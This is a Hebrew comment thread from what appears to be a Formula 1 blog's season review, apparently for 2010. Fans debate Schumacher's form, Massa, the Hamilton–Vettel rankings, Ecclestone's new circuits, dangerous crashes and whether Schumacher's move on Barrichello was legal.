    אני פשוט לא קונה את כל התאוריות האלה. שומאכר היה מהיר לכל אורך הקריירה שלו, ולא תמיד בנו לו מכונית לפי מידה. ב 2010 פתאום רוזברג עושה לו בית ספר. זה בגלל שהמכונית לא התאימה לשומאכר?
    שומאכר לקח אליפות עולם ב 1995 במכונית שנבחרה באטלס למכונית הכי מחורבנת אי פעם (מתוך אלה שלקחו אליפות). פתאום הרכב לא מתאים לסגנון הנהיגה של שומאכר.
    אותו הדבר בדיוק לגבי מאסה, קימי ואלונזו.

  7. כמו שאני רואה את זה, יש טווח שבו הנהג יכול להתאים את עצמו, ויש טווח שבו ניתן להתאים את המכונית. לפעמים פשוט אי אפשר להגיע לחפיפה טובה. גם קוביצה סבל מזה באחת העונות בב.מ.וו.
    לגבי מאסה, אני חושב שיש 4 תיאוריות ששווה לדבר עליהן: (1) רייקונן "שכח" איך נוהגים אחרי שלקח אליפות עולם, פשוט נכבה; (2) מאסה תמיד היה טוב יותר מרייקונן; (3) התאונה לקחה ממאסה את הביצים; (4) ברידג'סטון קדמיים רזים.
    מכל אלה, אני חושב שתיאוריות 3 ו-4 שוות עוד בדיקה בעונה הבאה – וזה בהנחה שהוא יתחיל את העונה במעמד שווה לזה של אלונסו.

  8. ניתוח יפה ואני מסכים לרובו רק כמה הערות קטנות. באטון היה ידוע ביכולת שלו לשמור על הצמיגים גם בעבר. וזה הבדל נוסף בינו לבין המילטון. באטון נוהג נהיגה מאוד חלקה, המילטון נכנס באם אימא של המכונית שבה הוא נוהג והוא סופר אגרסיבי וזה פוגע ביכולת של המכוניות שהוא נוהג להגיע לקו הסיום במצב אופטימלי או בכלל בכל השלישי האחרון גם המירוצים שאותם סיים הוא סיים כשהאוטו בקושי סוחב (בסינגפור הוא איבד הילוך). אני מסכים איתך שהמילטון נהג מלהיב אבל גם מסכים שבגלל הבעיות שלו הוא לא הולך לזכות בשנים הקרובות. לכן למרותש אני אוהד גדול של ווטל הוא חייב להיות לפני המילטון בדירוג. ווטל הוא נהג טוב מהמילטון במירוצי הדירוג אבל במירוץ עצמו הוא פישל כמה פעמים עם זינוקים גרועים ולדעתי הוא לא עקף מכונית אחת כל השנה. אבל אין לי ספק שהוא יתחזק בתחומים האלה. כואב הלב על מארק וובר מאוד קיוויתי שאם לא המילטון הוא ייקח אבל זה נכון שהוא נהג פחות מוכשר מווטל

  9. תיקון התכוונתי לומר שלמרות שאני אוהד גדול של המילטון, ווטל היה השנה נהג טוב ממנו

  10. ההסבר לגבי ההילוך השביעי מעניין. אני תוהה מה יהיה ההפרש בזמן הקפת דירוג עם הילוך שביעי ארוך או קצר. כנראה משמעותי, אם כולם בוחרים בהילוך הקצר. עוד דוגמה לכך שהתקנות דפוקות מהיסוד.
    לגבי שומכר ובאריקלו, לפי מה שאני זוכר זה לא היה צ'ופ: עוד ביציאה מהפנייה האחרונה הוא בחר בקו פנימי, והמשיך לנוע ימינה בהדרגה לאורך הישורת.
    בכל מקרה, אני מניח שפוסט סיכום העונה הוא לא ממש המקום המתאים לדון בעניין הזה…

  11. אורן,
    לגבי ההילוכים:
    לפי דעתי, לפני שיושמו תקנות הפארק פרמה (שאי אפשר לגעת רכב בין הדרוג למרוץ), לא רק שהיו משנים את היחס של ההילוך השביעי בין שני המקצים – כנראה שהיו משנים טיפונת את כל היחסים, כך שלא יהיה "חור" בין השישי לשביעי במרוץ. קח גם בחשבון את העובדה שעד לפני שתי עונות (נדמה לי), לא הייתה כל הגבלת סלד, כך שהבעיה הייתה הרבה יותר פשוטה לפתרון.

    לגבי שומאכר ובאריקלו, באמת אין טעם לדוש בזה יותר מדי. יש צילום וידאו וכל אחד יכול להסיק ממנו את המסקנות שלו.

    דדי,
    פיליפה מאסה נוהג בסידרה המון עונות, הוא זכור עוד מהתקופה שלו בסאובר, אני לא מוצא שום סיבה לראות בו נהג מהשורה הראשונה, או אנהג אם פוטנציאל להיות כזה, בהנתן המכונית הנכונה.
    אם כבר מחפשים טיעון בעדו, אני חושב שההישג הגדול ביותר שלו בקריירה הוא דווקא עונה אחת מול שומאכר שבה היו היה מאוד קרוב אליו בזמני ההקפות, וגם במרוצים.
    יתכן שרייקונן לקה ב 2008 בתיסמונת הקינן 2001, אינני יודע.

  12. למשקיף מבריטניה,
    אינני יודע איך קבעת שווטל טוב דרוג מהמילטון. ניתן לומר רק שהוא טוב מוובר (ולא בדקתי מי לקח יותר פולים, אני מניח שווטל), להמילטון פשוט לא היה רכב השנה.
    כמו שאמרתי במאמר, נהג שקיבל קרב צמוד מבינוני כמו וובר, לא יכול להיות מדורג כל כך גבוה, אבל מקובל כמובן שדעתך שונה.
    לגבי שמירה על המכונית, אני חושב שאתה מגזים. המילטון גם ניצח 3 מרוצים השנה, הוא באמת מכביד על הצמיגים יותר מאחרים, וזה בבירור, אבל בזה זה נגמר. אני לא רואה איך הוא מכביד על שאר המכלולים.
    שים לב שיש מגמה עם השנים של עלייה חדה באמינות הרכבים, בין השאר בגלל כל ההקפאות, שגורמות לכך שהרכיבים לא נמתחים לקצה יכולתם.

  13. סיכום נהדר לעונה ,
    הסיכום שלי לפחות בנושא העקיפות הוא במילה אחת : ברני אקלסטון.
    ברני כאיש עסקים הכניס לסבב מסלולים אנימיים משעממים ובלתי הולמים לספורט , והקומבינה שהוא רקם עם הירנן טילקה "אדריכל" המסלולים החדשים הכניסה את הספורט לבור עמוקה שאי אפשר לצאת ממנה, כחו לדוגמה את המסלולים שהוא בנה : בחריין, אבו דאבי,קוריאה,סינגפור,סין , טורקיה(להוציא turn 8 ). איזה מירוצים סיפקו מסלולים אלה לעומת המסלולים הוותיקים, מונזה או ספא למשל, כלום חוץ מנוף יפה ושאר זיבולי ארכטקטורה..אין יישורות ארוכות אין סיבובים מהירים בסוף יישורות, שום כלום. רק מספיק להיזכר במסלולים כמו : סן מרינו , צרפת , אדלייד, אינדיאנפוליס.. מרוצים טובים בטח שסיפקו אך כנראה לא מספיק כסף לברני אקלסטון …
    נחזור לברני אקלסטון : אין שום הסבר למה שהקשיש הזה עושה , ממשיך להוציא כל טעם טוב בספורט הזה , מה המשמעות למשל של מירוץ לילה עם פרוג'קטורים, אי אפשר להבין , הרי שנים התעוררנו ב 5 בבוקר למרוצי אוסטרליה, ויפן לאור יום ועם הרבה מתח, מה יפה במסלול חשוך (סינגפור) צר שלא מספק (חוץ מהרבה כסף לברני) שום דבר שקרוב למירוץ מכוניות שום עקיפה הרבה מאוד תאונות וספתי קאר ,
    לסיכום : הבעיה במסלולים שברני כפה על הסבב ואישית איננו רואה שזה הולך להשתנות, הקבוצות חייבות להתעורר ומהר ולהפסיק את הולכת השולל ולחפש חלופות ומהר …

  14. אני חושב שהפגמים היסודיים של המילטון בעיקר בשליש האחרון של העונה שאותם ציינת בתוספת הביצועים המרשימים של ווטל במקצי הדירוג – שלדעתי מוערכים הערכת חסר (במידה רבה בגלל שהוא בזבז שישה מהם נדמה לי במרוצים אם כי לא תמיד באשמתו) מצדיקים את העמדת ווטל לפניו אבל בוא נסכים לא להסכים בעניין הזה.
    עוד נקודה אחת לגבי העונה שלא התייחסו אליה היא כמה תאונות מסמרות שיער ממש שבנס לא נגמרו באסון כבד. התאונה של שומכר בתחילת המירוץ באבו דאבי היא אחת מהן – המכונית שנכנסה בו הייתה סנטימטרים מהראש שלו, לא רוצה לחשוב מה היה קורה אם היה הייתה כמה סנטימטרים ימינה. הייתה עוד תאונה אחת של מכונית על מכונית, שהיא לדעתי התאונה המסוכנת ביותר כי הראש של הנהגים לא מוגן (למיטב ידיעתי על כל פנים) אני לא זוכר באיזה מירוץ. והייתה כמובן התאונה של וובר ארבעה מטר עף באויר ונופל על הגג. נכון שהעובדה שהן נגמרו בלי נפגעים בנפש נובעת בין היתר מהשיפור הבטיחותי הגדול במכוניות (כפי שהוכיח מקרה וובר) אבל קשה שלא לתהות אם המזל ישחק לחבר'ה האלה תמיד, נקווה שכן כמובן – מכל מקום זה היה די מפחיד.

  15. ולגבי שומכר באריקלו מסכים איתך לחלוטין זו הייתה התנקשות לכל דבר, לא מבין אורן איך אפשר לחלוק על זה והפעולה הזו רק העצימה את הדימוי הבעייתי של שומאכר. כמו שאמר דיויד קולת'רד בעניין הזה, בהתחשב בכושר הירוד שלו העונה, לשומאכר הייתה הדמנות לפחות לשפר את התדמית שלו השנה והוא נכשל בה בגדול.למרבה השמחה באריקלו החביב שאכל הרבה ח.. משומאכר כשהיה מספר שניים שלו בפרארי יצא מזה בשלום רק בגלל שהקיר נגמר בזמן וגם הצליח לעקוף אותו לשמחת כל שונאי שומאכר (לרבות הח"מ)

  16. לגבי התאונה בזינוק באבו דאבי, אני מסכים איתך לגמרי. אלה סוג הנזקים שלא ניתן למנוע. הנהגים יושבים חשופים בקוקפיט ואני מכיר לפחות שני מקרים בהם עצם זר פגע באופן חמור מאוד בראשו של הנהג. אחד מהם הוא חתיכת המתכת שפגעה במאסה בהונגריה 2009 (אם אני לא טועה), והשני הוא למרבה הצער הגלגל שפגע באיירטון סנה באימולה 94. בהקשר הזה לא נעשה במהלך השנים שום שיפור בטיחותי, למעט אולי תקנה שמחייבת הגבהה של דפקנות הקוקפיט, וגם הריפוד ששמים שם.
    התאונה של שומאכר הייתה בקלות יכולה להגמר אחרת, ורק מזל מנע את זה.

  17. מזל שהיא מופיעה בדיוק פה, בתוך הפוסט שלך…

  18. http://www.youtube.com/watch?v=0sIQ7AlWo9o&feature=related

    טוב, אז כן נדבר על זה כאן :)
    שומכר התחיל לסטות ימינה מייד אחרי היציאה מהפנייה האחרונה, והמשיך את הסטייה הזו בהדרגה. כשהוא היה באמצע המסלול באריקלו היה צריך לבחור אם הוא נכנס ימינה או יוצא שמאלה, והוא בחר להיכנס. שומכר המשיך לסטות ימינה, שזה חוקי למיטב ידיעתי, וחזר שמאלה רק כשהיה לבאריקלו רווח של רוחב מכונית אחת + כמה מילימטרים בין הקיר למכונית של שומכר.
    אני לא רואה שום דבר לא חוקי במהלך הזה. זה היה מסוכן? כן. זה היה מכוער? בלי ספק. מישהו מאיתנו היה עושה את זה? בחיים לא. אבל זה היה חוקי.
    ראיתי העונה דברים הרבה יותר מקוממים – למשל ארבעת הזיגזוגים של המילטון לפני האף של קוביצה באחד המירוצים. לא היה שם קיר, אבל זה היה מנוגד בצורה בוטה לחוקים.
    ולמען הסר ספק, משקיף מבריטניה: תתקשה למצוא שונא שומכר גדול ממני באתר הזה. לדעתי הנזק שהוא גרם לספורט הוא עצום. אבל במקרה הספציפי הזה, הוא היה בסדר – לפחות ביחס לסטנדרטים הנוכחיים של הספורט, שהוא אחראי להם במידה רבה.

  19. דדי, מצטער, לא שמתי לב..

    אורן, אני חושב שאתה בוחן את המהלך של שומאכר רק לפי החוק היבש.
    למעשה עד כמה שזכור לי, החוק היבש לא אומר כלום כמעט על עקיפות. אפילו העניין של שינוי כיוון אחד לא קיים בחוק (שוב, אם זכרוני אינו מטעני, ככה זה היה בפעם האחרונה שבדקתי).
    ישנם דברים שלא כתובים בחוק, והם בכל זאת פשעים איומים.
    תסתכל למשל על הדבר הזה:
    http://www.youtube.com/watch?v=Up34H43ZTCk

    יש כאן משהו לא חוקי. נדמה לי שבמקרה הזה שומאכר כן נענש, לא שזה עזר לפרנצן.
    הנהיגה כאן היא מסוכנת ולא ספורטבית. זה צריך להספיק כדי להפעיל איזה סעיף כללי ולתת עונש חמור.

    לגבי מה שלואיס עשה לפטרוב:
    http://www.dailymotion.com/video/xctz1o_malaysia-hamilton-overtakes-petrov_auto
    הנושא כבר נטחן עד דוק. מרטין בראנדל אמר את זה כבר בשידור חי, ואני מסכים איתו- במקרה ההוא המילטון לא ניסה לחסום, הוא ניסה לנער את קוביצה מהסליפסטרים שלו, וזה חוקי והוגן לגמרי.
    שים לב להבדל העיקרי בין המקרים – במקרה של המילטון וקוביצה – לא הייתה שום חפיפה בין המכוניות לאורך כל המהלך, בשום שלב הגלגל הקדמי של קוביצה אפילו לא היה מקביל לגלגל האחורי של לואיס.
    ההבדל הבאמת המהותי – כשפטרוב אחרי לואיס ולואיס מזגז – פטרוב מנסה כל הזמן בכל הכוח להצמד אליו ( בשביל האוויר), אם היה מדובר על חסימה- פטרוב היה מנסה להכנס לחור שבו לואיס *לא נמצא*.
    מראית עין זה לא הכל. המהלך של לואיס לא נראה טוב, אבל הוא נקי והוגן לגמרי.

    במקרה של שומאגר ובאריקלו – בארקילו היה די קרוב להיות מקביל לשומאכר, וזה האחרון, באמת בדיוק של מנתחים זרק אותו לקיר ונתן לו שוב מקום בדיוק כשנגמר לבארקילו המסלול. זה היה מאוד מסוכן. המהלך של המילטון כלל לא היה מסוכן.
    כך אני חושב.

  20. די השתכנעתי, פרט לכמה נקודות די זניחות.
    אני מנסה לחשוב אם כשהתחלנו לראות מירוצים לפני 20 שנה היו כל-כך הרבה מקרים של מהלכים שנמצאים על גבול החוקיות והלגיטימיות. למיטב זכרוני, היו הרבה הרבה פחות.
    עצוב.

  21. אני מציע לך להסתכל על ההקפות האחרונות של מונאקו 1992. כמות הזגזוגים שסנה עשה שם ב 7 הקפות עולה כל כל אלה שראיתי ב 2010 גם יחד..

  22. וזו הבחירה של מנהלי הקבוצות ב F1:

    1. Alonso 229
    2. Vettel 220
    3. Hamilton 196
    4. Webber 146
    5. Kubica 129
    6. Button 86
    7. Rosberg 68
    8. Hulkenberg 17
    . Massa 17
    10. Barrichello 11

  23. לאחר צפיה בלינק (תודה לאורן), זה אכן נראה שסנה פשוט שמר על קו הגנתי במסלול בעיתי לעקיפה, מונאקו ידוע כמסלול בעיתי מצד אחד ומצד שני כאחד המסלולים שמזוהים עם הענף ופורמולה 1 בפרט כך שאני לא חושב שהוא יצא מהסבב, לפני כמה שבועות היתה תוכנית (אני חושב בערוץ ההסטוריה) על המסלול כולל רעיונות עם מיטב הנהגים כולל סנה.
    לגבי הכתבה מאוד נהנהתי לקרוא אותה ואת התגובות גם אם לא הסכמתי עם כל מה שנאמר בה

  24. תסתכל על 1:30 ועל 2:17. תוכל לראות זיגזוגים למטרות חסימה. לא המשכתי לצפות לאחר מכן, למיטב זכרוני זה מחמיר, עד שג'ון ווטסון אומר שזה כבר לא ספורטיבי.

  25. ניר,
    אני לא יודע אם זה בגלל שאני מגיע לפה פחות מבעבר, או מסיבה לא מובנת אחרת, אבל נדמה לי שלאחרונה אני מסכים איתך הרבה יותר מבעבר או מהמומלץ…
    בכל אופן, נהנתי מאד מהסיכום שלך. מבחינה טכנית המכוניות השנה הקשו מאד על עקיפות ואני גם מסכים איתך שהמסלולים (המודרניים במיוחד) רק מקשים עוד יותר. אבו דאבי הוא אבסורדי.
    אני מסכים איתך גם לגבי היתרונות והחסרונות של המילטון וכאוהד פרארי העובדה שהוא הנהג החביב עלי בסבב אומרת הכל. רמת התסכול כאוהד של הספורט מכך שהם לא מסוגלים לייצר פורמולה שתעניק יתרונות לנהגים כמו המילטון, מרחיקה אותי. בעונה הקרובה אולי הם יצרו מלאכותית יכולת עקיפה משופרת, אבל מעניין יהיה עד כמה הצמיגים יהרגו או יאפשרו נהיגה וירטואוזית. אני חושש שהם יעבדו לצד של נהגים מסוגו באטן ולא לצד של נהגים מסוגו של המילטון.

  26. לפי כל הסימנים לגבי 2011, אתה בהחלט צודק בגזרת באטון- המילטון.
    עוד מהלך מטומטם של ה FIA. אני מבין את הכוונה שלהם – יותר עצירות זה יותר בלאגן, יותר אי ודאות, יותר אקשן מלאכותי. הבעיה היא שזה בא על חשבון הנהיגה. לדעתי גם שומאכר יסבול מזה, אבל הוא גם ככה די סובל…
    ולגבי הסכוות או העדרן, משה, אני לא חושב שיש ביננו מחלוקות יסודיות רבות מדי. אני חושב שאחרי כל כך הרבה שנים של צפיה, אין כמעט ברירה אלא להגיע למסקנות דומות.
    בכל אופן, חן חן.

סגור לתגובות.